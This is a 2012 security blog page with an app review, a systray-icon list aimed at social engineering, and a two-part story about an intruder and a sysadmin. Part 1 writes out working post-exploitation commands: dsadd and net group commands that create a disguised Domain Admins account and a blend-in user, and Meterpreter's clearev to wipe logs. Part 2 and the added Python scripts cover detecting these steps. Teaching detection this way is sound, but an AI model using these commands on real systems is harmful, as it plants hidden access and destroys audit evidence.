Saturday 11 February 2012
Syn

Adventures of a Security Junkie
  • Know Your Enemy
    I haven't posted for a bit because to be honest I haven't had much to say about security that might be interesting. I have been active on my Cisco Basics blog though for anyone interested in that type of thing.


    I'll get to the point of this post though, recently I was emailed by a guy called Matt. In his email Matt suggested maybe we bounce a few ideas off each other for future blog stuff. To me this sounded great as I needed something to motivate me to get posting again but as most security people know, we can be a pretty suspicious and paranoid bunch. So I did a little digging on Matt, nothing too much just the run of the mill Google Fu and a little Maltego. Once I'd satisfied myself that Matt was probably Matt I emailed back and we began to chat. As it turned out Matt really knows his stuff and his site AttackVector is superb.




    The night before last I was reading Matt's article on Invasion of Privacy and the reason I'm bringing it to your attention is because it is hands down the best example of personal information gathering that I have read. Matt's subject was a spammer (what goes around comes around) but the same techniques that he describes can be employed against any target. He uses DNS, Whois, Facebook, LinkedIn, Google and other easily accessible services to research his target and gather data that most people probably don't even realise is out there. I strongly recommend that readers head over to Matt's site and check out his article called Invasion of Privacy to see how it's really done.

    Truly scary stuff!!!



  • WiFi Analyzer - Another Great App For The Wifi Toolbox
    Every now and then I come across an iPhone app that has some of the features that my ultimate wardriving app would have. WiFi Analyzer is no different; it hasn't got all of my wishlist features but it certainly has a few.

    The features I'm talking about are useful from a wardriving perspective but even more useful for siting my Access Point or when trying to find the best signal. Another use would be when tracking down that rogue access point that I might have detected.

    When firing up WiFi Analyzer I'm presented with a list of Access Points, the signal strength and the encryption in use. This is all pretty standard stuff that all my other WiFi apps do.




    I can drill down into the individual Access Points but what I really like is being able to select an Access Point and home in on it by signal strength.



    Here I can easily see when I am getting the best signal as I move around. This also makes pinpointing those rogue Access Points a piece of cake.

    Another feature I really like with WiFi Analyzer is the graph feature.



    Here I can see overlapping networks and I'll be able to make educated decisions on the selection of the channel to use for my AP to prevent interference from the neighbours' APs. Alternatively I could use WiFi Analyzer's recommendations.
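    The channel decision the graph view supports, together with the rogue-AP and "home in" uses mentioned above, as an added Python example that is not code from this post or from the WiFi Analyzer app. The scan list, the BSSIDs, the walk samples and the inventory of "known" BSSIDs are all constructed for the example; the only real-world input is the 2.4 GHz channel layout (22 MHz wide channels on 5 MHz centres, so channels fewer than five apart overlap).

```python
"""2.4 GHz channel planning and rogue-AP spotting from a scan list.

Added example, not from the original post or from the WiFi Analyzer app.
SCAN is a CONSTRUCTED list of neighbouring access points standing in for
the app's list view; SSIDs, BSSIDs and signal levels are made up.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessPoint:
    ssid: str
    bssid: str
    channel: int
    rssi_dbm: int      # received signal strength; more negative = weaker
    encryption: str


SCAN = [  # constructed neighbours, not our own AP
    AccessPoint("NextDoor", "00:11:22:33:44:02", 3, -60, "WPA"),
    AccessPoint("BTHub-1", "00:11:22:33:44:03", 6, -70, "WPA2"),
    AccessPoint("Coffee", "00:11:22:33:44:04", 6, -80, "OPEN"),
    AccessPoint("linksys", "00:11:22:33:44:05", 11, -55, "WEP"),
]


def overlaps(a: int, b: int) -> bool:
    """2.4 GHz channels are 22 MHz wide on 5 MHz centres, so two channels
    interfere whenever their numbers differ by less than five. Only 1, 6
    and 11 are mutually clear, which is why those are the usual candidates."""
    return abs(a - b) < 5


def dbm_to_mw(dbm: float) -> float:
    return 10 ** (dbm / 10)


def congestion_mw(scan, channel: int) -> float:
    """Total interfering power (mW) from every AP that overlaps `channel`.
    Summing in linear units means one loud neighbour outweighs several
    faint ones, which is what the graph view shows visually."""
    return sum(dbm_to_mw(ap.rssi_dbm) for ap in scan if overlaps(ap.channel, channel))


def recommend_channel(scan, candidates=(1, 6, 11)) -> int:
    """The 'educated decision' from the graph, done arithmetically."""
    return min(candidates, key=lambda c: congestion_mw(scan, c))


def find_rogues(scan, known_bssids):
    """Anything broadcasting that is not in the inventory. Keyed on BSSID
    rather than SSID, because an evil twin copies the SSID first."""
    return [ap for ap in scan if ap.bssid not in known_bssids]


def strongest_reading(samples):
    """Given (location, rssi_dbm) samples taken while walking with the
    'home in' view open, return the location with the best signal."""
    return max(samples, key=lambda s: s[1])[0]


if __name__ == "__main__":
    print("recommended channel:", recommend_channel(SCAN))
    for ap in find_rogues(SCAN, known_bssids={"00:11:22:33:44:03"}):  # BTHub-1 is ours (assumption)
        print("unknown AP:", ap.ssid, ap.bssid, "ch", ap.channel, ap.encryption)
    walk = [("desk", -72), ("corridor", -61), ("kitchen", -48), ("stairs", -66)]  # constructed
    print("signal strongest at:", strongest_reading(walk))
```

    With the constructed scan, channel 1 wins because only the channel 3 neighbour bleeds into it, while channel 6 collects that neighbour plus two co-channel APs and channel 11 has the loudest single AP sitting directly on it. Swapping in your own scan is just a matter of replacing SCAN.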



    All in all a pretty handy tool to add to your iPhone toolbox in my opinion.

    UPDATE: Apple have removed this and the other wardriving apps from the app store. The bunch of dicks!!!!!

    Oh well, jailbreaking looks all the more tempting now.


  • Systray Recognition System
    Impressive title, eh? Well okay, I'll admit it, the system is effectively this blog post and your ability to inconspicuously squint as you take in all the systray icons on other people's computers.

    What's the Systray?
    The Systray is the area on the Windows taskbar near the clock, properly referred to as the Notification Area I think. Often installed programs will display a small icon here indicating that they are running, and the icon may change depending on the state of the program. It's important that attention is paid to the subtle differences in the icons; for example, a slight colour change may indicate that a program is running or not running.


    Why blog about this?
    Well, I'm always checking out other people's systray icons and wondering what programs they represent. After not having much luck with finding a good list on the web to refer to I thought I would create one. I have set myself a goal of seeing how many icons I can get in the list within the month of February. I'll continue to add new ones after that but this will be my focus in February because I'm going to be quite busy at work and I'm studying for an exam at the end of the month.


    Why is this relevant to security?
    Recognising systray icons will not only tell you about the software installed and the state of that software (running, not running, enabled, disabled, version etc...) but will also tell you about the person using the computer (Geek, salesman, lazy, Hax0r etc...) and we all know that smart hackers hack people, not just computers. Systray icons will also tell you if that person is connected back to the office, if they are running encryption software etc... These are all things that I'm interested in and I imagine some people reading my blog are interested in as well. If you need any further convincing I suggest you watch Johnny Long's excellent "No Tech Hacking" presentation.

    Any comments, suggestions, corrections or submissions will be greatly appreciated. So let's bring on the icons!


    Remote Management

    VNC server -Not connected

    VNC Server - Connected

    Remotely Anywhere

    Logmein


    Anti-Virus / Security

    Avira - running

    Avira - Not Running

    McAfee

    McAfee On Access Scanner

    Norton

    Sophos - Running

    Sophos - Out of date

    Sophos - Disabled

    AVG - old version

    AVG - V 8.5

    AVG - V 8.5 - Outdated / Connection failed

    AVG - Running

    AVG - Paused

    Kaspersky

    Avast

    ZoneAlarm – No Traffic

    ZoneAlarm – Internet Locked

    ZoneAlarm - Running

    Microsoft Defender - Active

    Microsoft Defender - Running

    PCTools Threatfire - Enabled

    PCTools Threatfire - Disabled

    Tiny Personal Firewall v 2.0.15



    Communication

    Bluetooth - Disabled

    Bluetooth - Enabled

    Cisco VPN - Not connected

    Cisco VPN - Connected

    Wifi - Connected

    Wifi - Not Connected

    LAN - Connected

    LAN - Disconnected

    Cisco Network Magic - Running

    Cisco Network Magic - Not Running



    Encryption

    WinPT

    PGP

    TrueCrypt

    Sanctuary



    Other

    MS Security Center - Warning

    MS Windows Updates - Warning

    MS Office 2003

    VMWare Tools installed

    MS Outlook - New Mail

    Synaptics Pointing Device

    xampp

    Night Watchman Power Management

    Daemon Tools

    Daemon Tools - Emulation Enabled

    Daemon Tools - Emulation Disabled

    Realtek HD audio Manager

    Unlocker Assistant

    SIW


    Thanks to the following for submitting icons:

    Jimmy
    Dave
    James
    Charz
    Mark


  • What Bob Did. What Alice Saw - Part 2
    This is the 2nd part of the story which is all about Bob the evil hacker and Alice the overworked Sys Admin.

    In the previous post Bob was using some of his command line Kung Fu to carefully analyse the Walliford Active Directory before creating some very inconspicuous admin and user accounts. Bob, being the careful kind of guy that he is, also attempted to cover his tracks by deleting the logs on the victim server.

    In this post I'll be looking at how Alice might have spotted all of Bob's actions if she was following 2 best practices:

    1) Analysing the logs.
    2) Logging to another server.


    Part 2 - What Alice Saw

    Alice turns up at the office a few minutes early as usual. She likes to get in, grab her coffee and then start on her daily tasks. First she checks her emails for anything urgent, then the helpdesk, and finally she gets to her server logs. The information that Windows logs can be pretty overwhelming; luckily Alice has a few filters that she can apply to look for key events.

    What Alice ideally wants to know is what accounts have been added or deleted and what groups have been modified. She keeps a list of the events that she needs to watch out for to spot these types of activities. Other interesting events that Alice keeps a close eye on are those for people logging into servers, bad passwords and account lockouts.


    Her daily log analysis isn't her favourite job, but it's an important one. She would love to get her boss to pay for a tool to do the log correlation but unfortunately he doesn't see it as an important enough task. As soon as Alice finds the time and starts looking through the logs she starts to worry. She sees a whole bunch of login failures from earlier that morning.



    On closer inspection Alice sees some very strange-looking account names like metasploit.



    After those entries Alice sees an event 624, which indicates that a new account has been created for a user called Bob Ball.



    Alice checks the helpdesk to see if a call was raised for a new employee called Bob Ball; it wasn't.

    Next Alice can see an event 632 that shows that the new account has been added to the HR group.



    She makes a quick call to HR and finds that they know nothing of this mysterious account. Alice disables the account until she can get to the bottom of what's going on.

    Just as Alice finds a few minutes to spare she goes back to her logs and then her phone rings. As she's summoned to a project meeting she thinks that the logs will have to wait. Unfortunately the meeting takes up the rest of her day.

    The next day Alice gets to the office extra early so she can catch up with her tasks. However, on connecting to her server she finds the logs are almost completely empty. All the entries from the previous day have been cleared. The oldest event is an event 517, which shows that the logs have been cleared.



    As Alice sits back and thinks about things she is convinced that some evil hacker has tried to break into her network; she counts her lucky stars that she spotted the hacker's account and disabled it quickly before any damage was done.

    The End



    Okay, I know my story is pretty crap, but I bring all this log stuff up because I had recently had a conversation with someone who didn't realise just how much useful information is contained in the Windows security event logs. This post is really just to highlight 2 things. Get your logs off the server; there are plenty of great tools to do that, unfortunately they all cost a bit. Secondly, build time into your day to analyse the logs. Find out the important events and find a way to filter the logs to spot when something is wrong. (The IDs in this story are the Windows 2000/2003 ones; on Vista/2008 and later the same events are 4720 for account created, 4728 for member added to a global group, 4625 for logon failure and 1102 for the audit log being cleared.)

    If you want to learn more about the Windows Event Logs check out Randy Franklin Smith's site Ultimate Windows Security. His site is without doubt the best resource for learning about the Windows security logs I have ever found, and his webcasts are pretty amazing.


  • What Bob Did. What Alice Saw - Part 1
    Recently I've been having way too much fun looking at event logs and digging out which events are indicators of a compromise. As is typical for me I'll try to wrap some of that knowledge up into a little Bob story. So here goes.


    Part 1 - What Bob did.

    Bob has been up to his old tricks again and has found himself on the wrong side of someone's firewall. Well, maybe not the wrong side as far as Bob is concerned, but it certainly is for Alice, our Systems Administrator. Bob being Bob decides to start his day with a little pwnage; he hunts around for a target and after a little scanning decides to go with a wide open domain controller which he likes to call 10.0.1.233, or as Alice would call it, Server04.


    Bob, sporting his brand new installation of BackTrack 4, decides to test drive the fantastic Fast-Track scripts. He uses Fast-Track not because he's lazy or can't be bothered to learn Metasploit, but because he only has a few minutes before work and he needs to get his pwnage on pretty sharpish.



    After successfully getting his Meterpreter session Bob uses the shell command to drop down to a Command prompt. Once at the prompt he decides to list the users on the domain.

    net user /domain



    The resulting list is quite long and split into 3 columns; as Bob intends to extract the user list to use in future scripts he decides to make use of the DSQUERY command to give him the list as a single column, one account name per line.

    dsquery * -filter "(&(objectcategory=person)(objectclass=user)(name=*))" -limit 0 -attr samaccountname



    With that done Bob decides to go ahead and quickly create a couple of accounts. He wants to create 2 accounts, one as a user because after all that's where the data is, right? The other account will be an administrative user because that will help him get to other interesting places on the network. Another good reason for having 2 accounts is that if Walliford discover his intrusion they'll likely try to identify the intruder's user account and may well stop when they find the first one. Cunning eh!

    Now in the past Bob has used "Net User username password /add" to do this, but that will create an account that even the crappiest of admins will spot. What Bob needs to do is create an account that blends in with the rest of the user accounts, to do this he takes a look at a few user accounts that already exist to see what account properties are populated as standard.

    dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=jimm))" -limit 0 -attr *



    From here Bob can see that the user Jim Morrison has a Title, Office, Display Name, telephone Number and Home Drive fields neatly populated as do many of the other users. Armed with that knowledge Bob creates an account with DSADD that will sit nicely with the other accounts in the same Organisational Unit.

    dsadd user "CN=Bob Ball,OU=Internal,DC=walliford,DC=local" -Samid BobB -Pwd Eviluser123 -fn Bob -Ln Ball -Display "Bob Ball" -Office Leeds -Tel "01233 455779" -Dept HR -hmdir \\wal-filer\users\BobB -Title Manager -upn BobB@walliford.local



    Bob checks his handiwork before he moves on to his next task.

    dsquery * -filter "(&(objectcategory=person)(objectclass=user)(samaccountname=BobB))" -limit 0 -attr *



    Now Bob wants to give this user account access to some data, and that will be done by making Bob a member of some groups.

    dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=*))" -limit 0 -attr Name



    So there is the list of groups but lets take a closer look at the HR one first.

    dsquery * -filter "(&(objectcategory=group)(objectclass=group)(name=HR))" -limit 0 -attr *


    Okay that'll do. Bob just needs to modify the properties with DSMOD to add his user account as a member.

    dsmod group "CN=HR,OU=Internal,DC=walliford,DC=local" -addmbr "CN=Bob Ball,OU=Internal,DC=walliford,DC=local"




    With that sorted Bob wants to create his admin user. Hmmm, something that won't stand out again. He models the account on the other built-in accounts and sets his password to never expire. Hopefully this won't raise any eyebrows.

    dsadd user "CN=Cert Owner,CN=Users,DC=walliford,DC=local" -Samid CertOwner -Pwd EvilAdmin123 -Desc "Built-in account for administering certificates" -Display "Domain Certificate Owner" -pwdneverexpires yes

    Brilliant. No need to go to town on the groups again. This time he's adding the account straight into Domain Admins.

    net group "Domain Admins" CertOwner /add




    With that done Bob decides he really needs to get off to work.

    Whilst Bob's at work he's slightly troubled that he may have left traces in the logs on the server he compromised. As soon as he gets home he hops back onto the network and, just for fun, connects through RDP to the server to test his account.



    Works like a charm. He has a quick look around and logs off the RDP session. Then Bob remembers what he was supposed to be doing. He gets a new Meterpreter session up and issues the command to clear the logs:

    clearev



    All sorted. Now it's dinner time, pie and chips tonight.

    Coming up...What Alice Saw.
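    Part 1 above is the sequence of things Bob did; Part 2 (which sits earlier on this page, as the posts are listed newest first) is the handful of events Alice filters for. The following Python script is an added example that is not code from either post: it builds a constructed set of security-log records mirroring what Server04 would have written for Bob's morning (the scanner's failed logons, the two 624s, the two 632s and the evening 517) and runs Alice's filters over them. The event IDs are the Windows 2000/2003 ones the posts quote, paired with the Vista/2008+ equivalents; the timestamps, the scanner's address, the subject names, the SERVER04$ context and the helpdesk-ticket list are all assumptions.

```python
"""Alice's log filters, run over the events Bob's session would leave behind.

Added example, not code from either post. SAMPLE_EVENTS is CONSTRUCTED to
mirror the story; the timestamps, the scanner's address, the subject names
and the helpdesk ticket list are assumptions, not anything from the posts.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Windows 2000/2003 security event IDs quoted in the posts, paired with the
# Vista/2008-and-later IDs that record the same thing.
WATCHLIST = {
    517: (1102, "audit log cleared"),
    529: (4625, "logon failure: unknown user name or bad password"),
    624: (4720, "user account created"),
    632: (4728, "member added to security-enabled global group"),
    644: (4740, "account locked out"),
}

# A membership change here is never routine.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins",
                     "Schema Admins", "Administrators"}

SAMPLE_EVENTS = [  # constructed; SERVER04$ = the exploited service's SYSTEM context (assumption)
    {"time": "2012-02-01 06:30:00", "id": 624, "target": "saraw", "subject": "alice"},
    {"time": "2012-02-01 06:58:01", "id": 529, "target": "administrator", "source": "10.0.1.50"},
    {"time": "2012-02-01 06:58:02", "id": 529, "target": "metasploit", "source": "10.0.1.50"},
    {"time": "2012-02-01 06:58:02", "id": 529, "target": "msf", "source": "10.0.1.50"},
    {"time": "2012-02-01 06:58:03", "id": 529, "target": "guest", "source": "10.0.1.50"},
    {"time": "2012-02-01 06:58:04", "id": 529, "target": "backup", "source": "10.0.1.50"},
    {"time": "2012-02-01 06:58:05", "id": 529, "target": "test", "source": "10.0.1.50"},
    {"time": "2012-02-01 07:02:10", "id": 624, "target": "BobB", "subject": "SERVER04$"},
    {"time": "2012-02-01 07:03:40", "id": 632, "target": "BobB", "group": "HR", "subject": "SERVER04$"},
    {"time": "2012-02-01 07:05:12", "id": 624, "target": "CertOwner", "subject": "SERVER04$"},
    {"time": "2012-02-01 07:05:30", "id": 632, "target": "CertOwner", "group": "Domain Admins", "subject": "SERVER04$"},
    {"time": "2012-02-01 19:40:00", "id": 517, "subject": "SERVER04$"},
]


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def failed_logon_bursts(events, threshold=5, window=timedelta(minutes=5)):
    """Report every source that racks up `threshold` 529s inside `window`.
    A scanner guessing names like 'metasploit' looks exactly like this."""
    by_source = defaultdict(list)
    for e in events:
        if e["id"] == 529:
            by_source[e["source"]].append(e)
    bursts = []
    for source, evs in by_source.items():
        evs.sort(key=_ts)
        for i in range(len(evs)):
            j = i
            while j < len(evs) and _ts(evs[j]) - _ts(evs[i]) <= window:
                j += 1
            if j - i >= threshold:
                bursts.append({"source": source, "count": j - i,
                               "accounts": sorted({e["target"] for e in evs[i:j]})})
                break  # one alert per source is enough for the morning report
    return bursts


def account_changes(events, approved_new_starters):
    """Every 624 with no matching helpdesk ticket, and every 632; an addition
    to a privileged group is rated critical whatever the subject was."""
    alerts = []
    for e in events:
        if e["id"] == 624 and e["target"] not in approved_new_starters:
            alerts.append({"id": 624, "severity": "high",
                           "msg": f"account {e['target']} created by {e['subject']}, no ticket"})
        elif e["id"] == 632:
            severity = "critical" if e["group"] in PRIVILEGED_GROUPS else "medium"
            alerts.append({"id": 632, "severity": severity,
                           "msg": f"{e['target']} added to {e['group']} by {e['subject']}"})
    return alerts


def audit_cleared(events):
    """517 is written as the first record of the freshly emptied log, so it is
    the one trace clearev cannot remove. Everything before it is gone unless
    a copy was already sitting on another box."""
    return [e for e in events if e["id"] == 517]


def analyse(events, approved_new_starters=frozenset()):
    return {
        "failed_logon_bursts": failed_logon_bursts(events),
        "account_changes": account_changes(events, approved_new_starters),
        "log_cleared": audit_cleared(events),
    }


if __name__ == "__main__":
    report = analyse(SAMPLE_EVENTS, approved_new_starters={"saraw"})
    for b in report["failed_logon_bursts"]:
        print(f"{b['count']} failed logons from {b['source']} for {', '.join(b['accounts'])}")
    for a in report["account_changes"]:
        print(f"[{a['severity']}] event {a['id']} ({WATCHLIST[a['id']][0]} on 2008+): {a['msg']}")
    for e in report["log_cleared"]:
        print(f"[critical] event 517 at {e['time']}: audit log cleared by {e['subject']}")
```

    Two things worth noticing when this runs. The second 632 is rated critical because it puts CertOwner straight into Domain Admins, which is exactly the account Alice never got to in the story because she stopped at Bob Ball; a group-based rule does not care how plausible the account name looks. And the only reason any of these alerts exist after Bob's clearev is that the records were read before the wipe, which is the whole argument for the second best practice in Part 2: ship the events off the server as they happen, so the copy Bob clears is not the only copy.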




